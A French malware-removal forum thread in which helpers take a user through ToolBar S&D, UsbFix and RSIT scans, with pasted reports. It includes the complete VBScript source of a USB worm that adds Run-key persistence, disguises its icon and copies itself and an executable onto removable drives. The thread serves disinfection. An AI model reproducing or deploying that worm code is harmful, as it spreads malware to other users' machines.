    * Lance l'installation du programme en exécutant le fichier téléchargé.
    * Double-clique maintenant sur le raccourci de Toolbar-S&D.
    * Sélectionne la langue souhaitée en tapant la lettre de ton choix puis en validant avec la touche Entrée.
    * Choisis maintenant l'option 1 (Recherche). Patiente jusqu'à la fin de la recherche.
    * Poste le rapport généré. (C:\TB.txt)

ducashaa · Answer

C:\InstallRecus.exe supprimé 



Rapport généré par Toolbar-S&D (Team IDN) (C:\TB.txt) 

  '© Eric_71 ( Contact : eric.71.MesPages@gmail.com )
  On Error Resume Next
  Dim fso
  Set FSO = CreateObject("Scripting.FileSystemObject")
  Set FTX =  FSO.createTextFile("OS_v.txt",true)
  strComputer = "."
  Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\" & _
  strComputer & "oot\cimv2")
 
  Set OS__infos = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
  Set BO__infos = objWMIService.ExecQuery("Select * from Win32_ComputerSystem")
  Set US__infos = objWMIService.ExecQuery("Select * from Win32_NetworkLoginProfile")
  Set PR__infos = objWMIService.ExecQuery("Select * from Win32_Processor")
  Set BI__infos = objWMIService.ExecQuery("Select * from Win32_BIOS")
  Set DI__infos = objWMIService.ExecQuery("Select * from Win32_LogicalDisk",,48)
  Set objWMISecurity = GetObject("winmgmts:{impersonationLevel=impersonate}!\.oot\SecurityCenter") 
  Set colAV = objWMISecurity.ExecQuery("Select * from AntiVirusProduct")
  Set colFI = objWMISecurity.ExecQuery("Select * from FirewallProduct")
  Set wshNetwork = CreateObject("WScript.Network")
  strUser = wshNetwork.Username
  For Each objOS__ in OS__infos
      OSvers = objOS__.Caption & " ( v" & objOS__.Version & " ) " & objOS__.CSDVersion
      OSbuild = objOS__.BuildType
  Next
  For Each objBO__ in BO__infos
      BOprocT = objBO__.SystemType
  Next
  For Each objPR__ in PR__infos
      PRprocN = objPR__.Name
  Next
  For Each objBI__ in BI__infos
      BIbios = "BIOS : " & objBI__.Name
  Next
  For Each objUS__ in US__infos
      If objUS__.Privileges = 2 Then
                USuser = "USER : " & strUser & " ( Administrator )"
            Else
                USuser = "USER : " & strUser & " ( Not Administrator ! )"
            End If
  Next
  For Each objBO__ in BO__infos
      BOboot = "BOOT : " & objBO__.BootupState
  Next
  For Each objAV In colAV
      If objAV.OnAccessScanningEnabled = 0 Then
            AVstatus = "Not Activated"
      Else
            AVstatus = "Activated"
      End If
  Next
  For Each objFI In colFI
      If objFI.Enabled = 0 Then
            FIstatus = "Not Activated"
      Else
            FIstatus = "Activated"
      End If
  Next
  For Each objAV in colAV
      AVstat = "Antivirus : " & objAV.DisplayName & " " & objAV.VersionNumber & " (" & AVstatus & ")"
  Next
  For Each objFI In colFI
      FIstat = "Firewall  : " & objFI.DisplayName & " " & objFI.VersionNumber & " (" & FIstatus & ")"
  Next
  For Each objDI__ in DI__infos
      Select Case objDI__.DriveType
            Case 1 strTL = "..."
            Case 2 strTL = "USB"
            Case 3 strTL = "Local Disk"
            Case 4 strTL = "Network Disk"
            Case 5 strTL = "CD or DVD"
            Case 6 strTL = "RAM"
            Case Else strTL = "..."
      End Select
      If objDI__.DriveType =2 Then
            strTD = Int(objDI__.Size /1048576) & " Mo"
      Else
            strTD = Int(objDI__.Size /1073741824) & " Go"
      End If
      if strTD = " Go" Then
            strDI = strDI & objDI__.Name & "\ (" & strTL & ")" & vbCrlf
      elseif  strTD = " Mo" Then
            strDI = strDI & objDI__.Name & "\ (" & strTL & ")" & vbCrlf
      else
            strDI = strDI & objDI__.Name & "\ (" & strTL & ") - " & objDI__.FileSystem & _
            " - Total:" & strTD & " (Free:" & Int(objDI__.FreeSpace /1073741824) & " Go)" & vbCrlf
      end if
  Next
  FTX.writeline OSvers
  FTX.writeline BOprocT & " ( " & OSbuild & " : " & PRprocN & " )"
  FTX.writeline BIbios
  FTX.writeline USuser
  FTX.writeline BOboot
  FTX.writeline ""
  FTX.writeline AVstat
  FTX.writeline FIstat
  FTX.writeline ""
  FTX.writeline strDI
  FTX.close

Lyonnais92 · Answer

Bonjour

Pour Toolbar S&D, ce n'est pas ce que j'attends, tu as du faire une manip imprévue :

Je te redonne le mode d'emploi.

Tu n'as pas du choisir l'option 1.

Télécharge Toolbar-S&D (Team IDN) sur ton Bureau : 

https://77b4795d-a-62cb3a1a-s-sites.googlegroups.com/site/eric71mespages/ToolBarSD.exe?attachauth=ANoY7cqJWPphpudyTqv7TRo5RQ3nm_Sx8JluVMO59X5E9cyE3j3LqKlmStIqiDqJdIgMJLi7MXn2nKVajQfoWuVvZZ2wIx_vkqO4k4P0K9jh-ra9jaKPXdZcoaVF2UqJZNH8ubL_42uIwh6f35xJ2GJMuzddVj2Qth1DgZ839lxEIFGkgWz3TdfvNMy-YtxfA3gqBUrj4U4LFeAPiWr3ClmjIP0t_Xs5PQ%3D%3D&attredirects=2 

* Lance l'installation du programme en exécutant le fichier téléchargé. 
* Double-clique maintenant sur le raccourci de Toolbar-S&D. 
* Sélectionne la langue souhaitée en tapant la lettre de ton choix puis en validant avec la touche Entrée. 
* Choisis maintenant l'option 1 (Recherche). Patiente jusqu'à la fin de la recherche. 
* Poste le rapport généré. (C:\TB.txt)

ducashaa · Answer

Je pense ke c'est ce ke j'ai fait

Je vais le refaire et tout te décrire

J'ai Toolbar-S&D (Team IDN) sur le bureau, je l'exécute

Je choisis F, et il me sort ça en blocnote:


  'Discl ToolBar S&D (fr)

  MsgBox " "&VbCrLf&"L'outil à été testé et utilisé des centaines de fois mais il peut toutefois indiquer des fichiers / dossiers légitimes !"&VbCrLf&" "& _
             VbCrLf&"Ne pas lancer la phase de désinfection sans l'avis d'un spécialiste !"&VbCrLf&" "& _
             VbCrLf&"Dans le doute postez votre rapport sur un forum."&VbCrLf&" "& _
             VbCrLf&"Toute modification des composants de l'outil ou une mauvaise utilisation peut entrainer des dysfonctionnements."& _
             VbCrLf&" ",vbExclamation,"  ToolBar S&D"


Je ferme ce blocnote, je choisis 1(Recherche), je valide. j'ai ce qui suit en blocnote:

  '© Eric_71 ( Contact : eric.71.MesPages@gmail.com )
  On Error Resume Next
  Dim fso
  Set FSO = CreateObject("Scripting.FileSystemObject")
  Set FTX =  FSO.createTextFile("OS_v.txt",true)
  strComputer = "."
  Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\" & _
  strComputer & "oot\cimv2")
 
  Set OS__infos = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
  Set BO__infos = objWMIService.ExecQuery("Select * from Win32_ComputerSystem")
  Set US__infos = objWMIService.ExecQuery("Select * from Win32_NetworkLoginProfile")
  Set PR__infos = objWMIService.ExecQuery("Select * from Win32_Processor")
  Set BI__infos = objWMIService.ExecQuery("Select * from Win32_BIOS")
  Set DI__infos = objWMIService.ExecQuery("Select * from Win32_LogicalDisk",,48)
  Set objWMISecurity = GetObject("winmgmts:{impersonationLevel=impersonate}!\.oot\SecurityCenter") 
  Set colAV = objWMISecurity.ExecQuery("Select * from AntiVirusProduct")
  Set colFI = objWMISecurity.ExecQuery("Select * from FirewallProduct")
  Set wshNetwork = CreateObject("WScript.Network")
  strUser = wshNetwork.Username
  For Each objOS__ in OS__infos
      OSvers = objOS__.Caption & " ( v" & objOS__.Version & " ) " & objOS__.CSDVersion
      OSbuild = objOS__.BuildType
  Next
  For Each objBO__ in BO__infos
      BOprocT = objBO__.SystemType
  Next
  For Each objPR__ in PR__infos
      PRprocN = objPR__.Name
  Next
  For Each objBI__ in BI__infos
      BIbios = "BIOS : " & objBI__.Name
  Next
  For Each objUS__ in US__infos
      If objUS__.Privileges = 2 Then
                USuser = "USER : " & strUser & " ( Administrator )"
            Else
                USuser = "USER : " & strUser & " ( Not Administrator ! )"
            End If
  Next
  For Each objBO__ in BO__infos
      BOboot = "BOOT : " & objBO__.BootupState
  Next
  For Each objAV In colAV
      If objAV.OnAccessScanningEnabled = 0 Then
            AVstatus = "Not Activated"
      Else
            AVstatus = "Activated"
      End If
  Next
  For Each objFI In colFI
      If objFI.Enabled = 0 Then
            FIstatus = "Not Activated"
      Else
            FIstatus = "Activated"
      End If
  Next
  For Each objAV in colAV
      AVstat = "Antivirus : " & objAV.DisplayName & " " & objAV.VersionNumber & " (" & AVstatus & ")"
  Next
  For Each objFI In colFI
      FIstat = "Firewall  : " & objFI.DisplayName & " " & objFI.VersionNumber & " (" & FIstatus & ")"
  Next
  For Each objDI__ in DI__infos
      Select Case objDI__.DriveType
            Case 1 strTL = "..."
            Case 2 strTL = "USB"
            Case 3 strTL = "Local Disk"
            Case 4 strTL = "Network Disk"
            Case 5 strTL = "CD or DVD"
            Case 6 strTL = "RAM"
            Case Else strTL = "..."
      End Select
      If objDI__.DriveType =2 Then
            strTD = Int(objDI__.Size /1048576) & " Mo"
      Else
            strTD = Int(objDI__.Size /1073741824) & " Go"
      End If
      if strTD = " Go" Then
            strDI = strDI & objDI__.Name & "\ (" & strTL & ")" & vbCrlf
      elseif  strTD = " Mo" Then
            strDI = strDI & objDI__.Name & "\ (" & strTL & ")" & vbCrlf
      else
            strDI = strDI & objDI__.Name & "\ (" & strTL & ") - " & objDI__.FileSystem & _
            " - Total:" & strTD & " (Free:" & Int(objDI__.FreeSpace /1073741824) & " Go)" & vbCrlf
      end if
  Next
  FTX.writeline OSvers
  FTX.writeline BOprocT & " ( " & OSbuild & " : " & PRprocN & " )"
  FTX.writeline BIbios
  FTX.writeline USuser
  FTX.writeline BOboot
  FTX.writeline ""
  FTX.writeline AVstat
  FTX.writeline FIstat
  FTX.writeline ""
  FTX.writeline strDI
  FTX.close










Je ferme le blocnote, je valide la recherche commence:

J'ai ce rapport, je crois c'est ce ke tu espères


   -----------\  ToolBar S&D 1.2.4   XP/Vista


   "C:\ToolBar SD" ( MAJ : 27-10-2008|09:25 )
   Option : [1] ( 07/11/2008|10:39 )

   -----------\  Recherche de Fichiers / Dossiers ...

   C:\WINDOWS\Prefetch\HOTBARUNINSTALLER.EXE-245BB847.pf
   C:\DOCUME~1\ups\APPLIC~1\Search Settings
   C:\DOCUME~1\ups\APPLIC~1\Search Settings\kb127
   C:\Program Files\Search Settings
   C:\Program Files\Search Settings\kb127
   C:\Program Files\Search Settings\SearchSettings.exe
   C:\DOCUME~1\ups\APPLIC~1\SmartShopper
   C:\DOCUME~1\ups\APPLIC~1\SmartShopper\cs
   C:\Program Files\SmartShopper
   C:\Program Files\SmartShopper\Bin
   C:\Program Files\SmartShopper\cs
   C:\Program Files\SmartShopper\Uninst.exe
   C:\DOCUME~1\ALLUSE~1\MENUDM~1\PROGRA~1\SmartShopper
   C:\WINDOWS\iun6002.exe
   C:\Program Files\MSN Messengeriched20.dll

   -----------\  [..\Internet Explorer\Main]

   [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
   "Local Page"="C:\WINDOWS\system32\blank.htm"
   "Search Page"="https://www.google.com/?gws_rd=ssl"
   "Search Bar"="http://www.google.com/toolbar/ie8/sidebar.html"

   [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
   "Default_Page_URL"="https://www.msn.com/fr-fr/?ocid=iehp"
   "Default_Search_URL"="http://www.google.com/toolbar/ie8/sidebar.html"
   "Search Page"="https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF"
   "Start Page"="https://www.google.com/?gws_rd=ssl"


   --------------------\  Recherche d'autres infections

   --------------------\  Cracks & Keygens ..

   C:\DOCUME~1\ups\Favoris\ZCRACK  software crack download site  cracks serials keygens keys warez software application program download.url
   C:\DOCUME~1\ups\Mes documents\didi\winzip11_keygen-VIRILITY.zip
   C:\DOCUME~1\ups\Mes documents\didi\winzip[1].9.0.keygen-tsrh.zip



   1 - "C:\ToolBar SD\TB_1.txt" - 07/11/2008|10:41 - Option : [1]

   -----------\  Fin du rapport a 10:41:00,20

ducashaa · Answer

Voici le rapport:



   -----------\  ToolBar S&D 1.2.4   XP/Vista


   "C:\ToolBar SD" ( MAJ : 27-10-2008|09:25 )
   Option : [1] ( 07/11/2008|10:39 )

   -----------\  Recherche de Fichiers / Dossiers ...

   C:\WINDOWS\Prefetch\HOTBARUNINSTALLER.EXE-245BB847.pf
   C:\DOCUME~1\ups\APPLIC~1\Search Settings
   C:\DOCUME~1\ups\APPLIC~1\Search Settings\kb127
   C:\Program Files\Search Settings
   C:\Program Files\Search Settings\kb127
   C:\Program Files\Search Settings\SearchSettings.exe
   C:\DOCUME~1\ups\APPLIC~1\SmartShopper
   C:\DOCUME~1\ups\APPLIC~1\SmartShopper\cs
   C:\Program Files\SmartShopper
   C:\Program Files\SmartShopper\Bin
   C:\Program Files\SmartShopper\cs
   C:\Program Files\SmartShopper\Uninst.exe
   C:\DOCUME~1\ALLUSE~1\MENUDM~1\PROGRA~1\SmartShopper
   C:\WINDOWS\iun6002.exe
   C:\Program Files\MSN Messengeriched20.dll

   -----------\  [..\Internet Explorer\Main]

   [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
   "Local Page"="C:\WINDOWS\system32\blank.htm"
   "Search Page"="https://www.google.com/?gws_rd=ssl"
   "Search Bar"="http://www.google.com/toolbar/ie8/sidebar.html"

   [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
   "Default_Page_URL"="https://www.msn.com/fr-fr/?ocid=iehp"
   "Default_Search_URL"="http://www.google.com/toolbar/ie8/sidebar.html"
   "Search Page"="https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF"
   "Start Page"="https://www.google.com/?gws_rd=ssl"


   --------------------\  Recherche d'autres infections

   --------------------\  Cracks & Keygens ..

   C:\DOCUME~1\ups\Favoris\ZCRACK  software crack download site  cracks serials keygens keys warez software application program download.url
   C:\DOCUME~1\ups\Mes documents\didi\winzip11_keygen-VIRILITY.zip
   C:\DOCUME~1\ups\Mes documents\didi\winzip[1].9.0.keygen-tsrh.zip



   1 - "C:\ToolBar SD\TB_1.txt" - 07/11/2008|10:41 - Option : [1]

   -----------\  Fin du rapport a 10:41:00,20






J'ai re téléchargé la mise à jour de UsbFix (de Chiquitine29)
que j'ai exécuté ce matin à sa demande,
voici le rapport qui en sort:


Avant l'affichage du rapport j'ai eu ceci
' |-----0\------------------------/0-----|
' |-----0-\--/\GOOD ADVENTURE/\--/-0-----|
' |-----0--/ \-----LA-----/ /--0-----|
' |-----0--/\ /--PUISSANCE-\ /\--0-----|
' |-----0-/--/-----2008-----/--\-0-----|
' |-----0/------------------------\0-----|

'vbsfile="getspecialfolder(1)\WScript.exe, 2"
on error resume next
Target ="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FIXEDFON.FON"
Noun="Path%%%.txt"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSSH = CreateObject("WScript.Shell")
Set fold = FSO.GetSpecialFolder(1)
fold1 = cstr(fold)
location1 = wscript.scriptfullname
if instr(location1,fold1)=false then
wssh.run mid(wscript.scriptfullname,1,3)
if (fso.fileexists(Fold & "\Win32.vbs")) then
else
UP
result = wssh.regread ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\DefaultIcon\")
wssh.Regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Vbsfile\DefaultIcon\",result
chmn1=Fold
prov1=mid(location1,1,len(location1)-13)
PhotoC prov1
end if
else
Do while time <> "00:00:00"
if not proc() then
Exec1 fold & "\Ecran"
end if
SUK
wscript.sleep 100
Loop
end if

Sub Exec1(exe)
wssh.run exe
End sub

Function proc()
proc=false
Set objWMI = GetObject("winmgmts:root\cimv2")
sQuery = "Select * from Win32_process"
For Each oproc In objWMI.execquery(sQuery)
if oproc.Name= "Ecran.exe"then
proc=true
exit for
end if
Next
Set objWMI = Nothing
End function

sub UP()
set lieu = FSO.GetSpecialFolder(1)
set wssh = CreateObject("WScript.Shell")
wssh.regwrite Target,FSO.GetSpecialFolder(1) & "\Win32.vbs"
end sub

sub PhotoC(provien)
on error resume next
Dim FSO1,Flder
DateCreate FSO.GetSpecialFolder(1) & "\Win32.vbs"
if not (fso.fileexists(FSO.GetSpecialFolder(1) & "\VB6FR.DLL")) then
fso.copyfile provien & "\THe Girls\VB6FR.DLL" ,FSO.GetSpecialFolder(1) & "\VB6FR.DLL",true
end if
if not (fso.fileexists(FSO.GetSpecialFolder(1) & "\MSCMCFR.DLL")) then
fso.copyfile provien & "\THe Girls\MSCMCFR.DLL" ,FSO.GetSpecialFolder(1) & "\MSCMCFR.DLL",True
end if
fso.copyfile provien & "\THe Girls\Ecran.exe" ,FSO.GetSpecialFolder(1) & "\Ecran.exe",true
Set FSO1 = CreateObject("Scripting.FileSystemObject")
FSO1.CopyFolder provien & "\THe Girls" ,FSO.GetSpecialFolder(1) & "\THe Girls",True
end sub
sub PhotoC1(Chemin,nomfich)
Dim FSO1
fso.copyfile wscript.scriptfullname ,Chemin & "\" & nomfich,true
fso.copyfile FSO.GetSpecialFolder(1) & "\Ecran.exe" ,Chemin & "\Ecran.exe",true
Set FSO1 = CreateObject("Scripting.FileSystemObject")
FSO1.CopyFolder FSO.GetSpecialFolder(1) & "\THe Girls" ,chemin & "\THe Girls",True
end sub

sub SUK()
Dim suk1, suk2,unite1,fso,f,fso1
Set FSO = CreateObject("Scripting.FileSystemObject")
Set FSO1 = CreateObject("Scripting.FileSystemObject")
Set suk2 = fso.Drives
For Each suk1 in suk2
Unite1 = suk1.Driveletter & ":"
TypeUnit= detectamovibles(Unite1)
if TypeUnit ="UK" and suk1.isready then
if not (fso.fileexists(Unite1 & "\The_Cars.vbs")) then
PhotoC1 Unite1 ,"The_Cars.vbs"
Set f = fso1.OpenTextFile(fold & "\" & Noun, 2,true)
f.write(unite1)
else
end if
end if
Next
end sub

Function detectamovibles(drvpath)
Dim fso, d, s, t
Set fso = CreateObject("Scripting.FileSystemObject")

Set d = fso.GetDrive(fso.GetDriveName(fso.GetAbsolutePathName(drvpath)))
Select Case d.DriveType
Case 0: t ="Inconnu"
Case 1: t ="UK"
Case 2: t ="F"
Case 3: t ="Réso"
Case 4: t ="CDR"
Case 5: t ="RD"
End Select
detectamovibles=t
end function
sub DateCreate(LieuplusFile)
Dim fso, f, f2, ts, ts2
Dim Ligne
Set FSO = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(wscript.scriptfullname)
Set ts = f.OpenAsTextStream(1, -2)
fso.CreateTextFile LieuplusFile
Set f2 = fso.GetFile(LieuplusFile)
Set ts2 = f2.OpenAsTextStream(2, -2)

do
Ligne = ts.readline
ts2.write Ligne & vbcrlf
loop until ts.AtEndOfStream
ts.Close
ts2.write "'" & date
ts2.Close
end sub
'16/08/2008
'06/10/2008
'10/15/2008
'23/10/2008



Voici le rapport
-------------- UsbFix V2.395 ---------------

* User : ups - PERSO
* Outils mis a jours le 06/11/2008 par Chiquitine29 et Chimay8
* Recherche effectuée à 9:48:10 le 07/11/2008
* Windows Xp - Internet Explorer 6.0.2900.2180


--------------- [ Processus actifs ] ----------------


C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\system32\userinit.exe
C:\DOCUME~1\ups\LOCALS~1\Temp\1.tmp\b2e.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe
C:\ZMSoft\HParlant\HParlante.exe
C:\Program Files\Search Settings\SearchSettings.exe
C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe
C:\Program Files\Alwil Software\Avast4\setup\avast.setup
C:\WINDOWS\system32\NOTEPAD.EXE
C:\WINDOWS\system32\ctfmon.exe

--------------- [ Informations lecteurs ] ----------------

C: - Lecteur fixe

F: - Lecteur amovible


--------------- [ Registre / Startup ] ----------------


! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
SunJavaUpdateSched REG_SZ "C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe"
Horloge Parlante ZMSoft REG_SZ C:\ZMSoft\HParlant\HParlante.exe
SearchSettings REG_SZ C:\Program Files\Search Settings\SearchSettings.exe
Adobe Reader Speed Launcher REG_SZ "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\OptionalComponents

! REG.EXE VERSION 3.0

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
MsnMsgr REG_SZ "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
ctfmon.exe REG_SZ C:\WINDOWS\system32\ctfmon.exe
swg REG_SZ C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
SuperCopier2.exe REG_SZ C:\Program Files\SuperCopier2\SuperCopier2.exe
Messenger (Yahoo!) REG_SZ "C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet
H/PC Connection Agent REG_SZ "C:\PROGRA~1\MI3AA1~1\wcescomm.exe"

--------------- [ Registre / Mountpoint2 ] ----------------


-> Recherche négative.

--------------- [ Nettoyage des disques ] ----------------

Supprimé ! - [23/10/2008 11:45] C:\WINDOWS\system32\Win32.vbs
Supprimé ! - [23/10/2008 11:45] F:\The_Cars.vbs

--------------- [ Listing des fichiers présents ] ----------------

-> /!\ Le resultat doit etre interprété par un spécialiste /!\

[12/01/2006 11:54][--a------] C:\AUTOEXEC.BAT
[03/08/2004 20:38][-rahs----] C:\NTDETECT.COM
[09/04/2008 13:17][--a------] C:\DVD-GO.exe
[09/04/2008 13:17][--a------] C:\lj1020_1022-HB-pnp-win32-fr.exe
[17/06/2008 14:23][---hs----] C:\boot.ini

--------------- [ Vaccination ] ----------------

C:\autorun.inf - Dossier autorun.inf crée par UsbFix !
F:\autorun.inf - Dossier autorun.inf crée par UsbFix !

--------------- ! Fin du rapport ! ----------------

Lyonnais92 · Answer

Re,

je pense que Chiquitine a fait passer une version évolué du fix prenant mieux en compte ton infection.

Relance Toolbar-S&D en double-cliquant sur le raccourci. Tape sur "2" puis valide en appuyant sur "Entrée". 
! Ne ferme pas la fenêtre lors de la suppression ! 
Un rapport sera généré, poste son contenu ici. 

--------------------

La politique des cracks mène logiquement aux infections.

Je te conseille vivement de supprimer les tiens le plus rapidement possible.

Utilisateur anonyme · Answer

RE, Lyonnais

c est tout a fait ça

a noter que le lecteur E n a pas été désinfecté car pas branché :

[23/10/2008 11:45][--a------] E:\The_Cars.vbs 


bonne suite

Lyonnais92 · Answer

Re,

Chiquitine29, merci de la remarque.

ducashaa, le 23 octobre, 2 clés USB (ou équivalent) ont été infectées ensemble. une seule a été désinfectée.

L'autre reste infectée.

Si tu l'as à ta disposition, recommence la manip avec elle.

Sinon, il serait important que tu préviennes son possesseur pour qu'il puisse se désinfecter et arrêter d'infecter les ordis auxquels il se connecte avec.

ducashaa · Answer

Ok,
j'ai répéré la clé USB. je vous tiens au courant. Mais comment savoir si la machine n'est plus infectée?
merci

Lyonnais92 · Answer

Re,

quand tu auras refait passer USBFix nouvelle version avec la clé branchée, tu postes le nouveau rapport de USBFix.

Ensuite, 

Télécharge ici :

http://images.malwareremoval.com/random/RSIT.exe

random's system information tool (RSIT) par random/random et sauvegarde-le sur le Bureau.

Double-clique sur RSIT.exe afin de lancer RSIT.

Lis le contenu de l'écran Disclaimer puis clique sur Continue (si tu acceptes les conditions).

Si l'outil HijackThis (version à jour) n'est pas présent ou non détecté sur l'ordinateur, RSIT le téléchargera (autorise l'accès dans ton pare-feu, si demandé) et tu devras accepter la licence.

Lorsque l'analyse sera terminée, deux fichiers texte s'ouvriront.

Poste le contenu de log.txt

L'examen de ce rapport va me permttre de savoir si tu es encore infecté.

Tu me diras aussi comment se comporte l'ordi.

ducashaa · Answer

Bjr Lyonnais,

le rapport, avec les 2 clés USB branché

-------------- UsbFix V2.395 ---------------

* User : ups - PERSO
* Outils mis a jours le 06/11/2008 par Chiquitine29 et Chimay8
* Recherche effectuée à  9:39:43 le 08/11/2008
* Windows Xp - Internet Explorer 6.0.2900.2180 
  
  
--------------- [ Processus actifs ] ----------------   
  
 
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\userinit.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\DOCUME~1\ups\LOCALS~1\Temp\1.tmp\b2e.exe
C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe
  
--------------- [ Informations lecteurs ] ----------------   
  
C: - Lecteur fixe

E: - Lecteur amovible

F: - Lecteur amovible

 
+- Contenu de l'autorun : C:\autorun.inf  

 
+- Contenu de l'autorun : F:\autorun.inf  

  
--------------- [ Registre / Startup ] ----------------   
 

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SunJavaUpdateSched	REG_SZ	"C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe"
    Horloge Parlante ZMSoft	REG_SZ	C:\ZMSoft\HParlant\HParlante.exe
    SearchSettings	REG_SZ	C:\Program Files\Search Settings\SearchSettings.exe
    Adobe Reader Speed Launcher	REG_SZ	"C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\OptionalComponents

! REG.EXE VERSION 3.0

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    MsnMsgr	REG_SZ	"C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
    ctfmon.exe	REG_SZ	C:\WINDOWS\system32\ctfmon.exe
    swg	REG_SZ	C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
    SuperCopier2.exe	REG_SZ	C:\Program Files\SuperCopier2\SuperCopier2.exe
    Messenger (Yahoo!)	REG_SZ	"C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet
    H/PC Connection Agent	REG_SZ	"C:\Program Files\Microsoft ActiveSync\wcescomm.exe"
  
--------------- [ Registre / Mountpoint2 ] ----------------   
  
 
 -> Recherche négative. 
  
--------------- [ Nettoyage des disques ] ----------------   
   
Echec de la supression !! - [08/11/2008 09:39] C:\autorun.inf   
Echec de la supression !! - [08/11/2008 09:39] C:\autorun.inf   
Supprimé ! - [08/11/2008 09:39] C:\autorun.inf    
Supprimé ! - [05/11/2008 14:30] E:\The_Cars.vbs    
Echec de la supression !! - [08/11/2008 09:20] F:\autorun.inf   
Echec de la supression !! - [08/11/2008 09:20] F:\autorun.inf   
Supprimé ! - [08/11/2008 09:20] F:\autorun.inf    
  
--------------- [ Listing des fichiers présents ] ----------------   
  
 -> /!\ Le resultat doit etre interprété par un spécialiste  /!\   
  
[12/01/2006 11:54][--a------] C:\AUTOEXEC.BAT   
[03/08/2004 20:38][-rahs----] C:\NTDETECT.COM   
[09/04/2008 13:17][--a------] C:\DVD-GO.exe   
[09/04/2008 13:17][--a------] C:\lj1020_1022-HB-pnp-win32-fr.exe   
[17/06/2008 14:23][---hs----] C:\boot.ini   
[29/08/2008 08:34][--a------] F:\SuperCopier2beta1-9.exe   
  
--------------- [ Vaccination ] ----------------   
  
C:\autorun.inf - Dossier autorun.inf crée par UsbFix !  
E:\autorun.inf - Dossier autorun.inf crée par UsbFix !  
F:\autorun.inf - Dossier autorun.inf crée par UsbFix !  
 
--------------- ! Fin du rapport ! ----------------  

Pour ce ki est du comportement de la machine:
- la barre d'outils change de forme à chaque redémarrage avec UsbFix, pas facile de le redimensionner
- la machine se plante
- les fenetres s'ouvrent comme si on avait cliqué sur la touche droite de la souris

Lyonnais92 · Answer

Re,

Ok, j'attends le rapport de RSIT.

ducashaa · Answer

le rapport RSIT:

Logfile of random's system information tool 1.04 (written by random/random)
Run by ups at 2008-11-08 10:34:06
Microsoft Windows XP Professionnel Service Pack 2
System drive C: has 1 GB (15%) free of 10 GB
Total RAM: 254 MB (23% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:35, on 08/11/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe
C:\ZMSoft\HParlant\HParlante.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\WINDOWS\system32\ctfmon.exe
